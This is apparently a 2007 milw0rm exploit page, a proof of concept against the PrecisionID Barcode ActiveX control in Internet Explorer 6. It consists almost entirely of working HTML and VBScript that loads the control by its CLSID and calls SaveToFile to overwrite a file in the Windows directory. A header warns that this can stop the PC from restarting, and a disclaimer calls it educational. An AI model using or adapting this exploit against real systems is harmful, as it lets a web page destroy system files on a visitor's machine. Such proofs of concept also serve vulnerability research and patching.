<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------
<b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite</b>
url: http://www.precisionid.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
all software that use this ocx are vulnerable to these exploits.
If you try this exploit with IE 7, it just stops to answer
-----------------------------------------------------------------------------------------------------
<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
"Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
test.SaveToFile "c:\windows\system_.ini"
MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/11 - Morovia Barcode")
Else
MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/16 - PrecisionID Barcode ActiveX")
End If
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-05-16]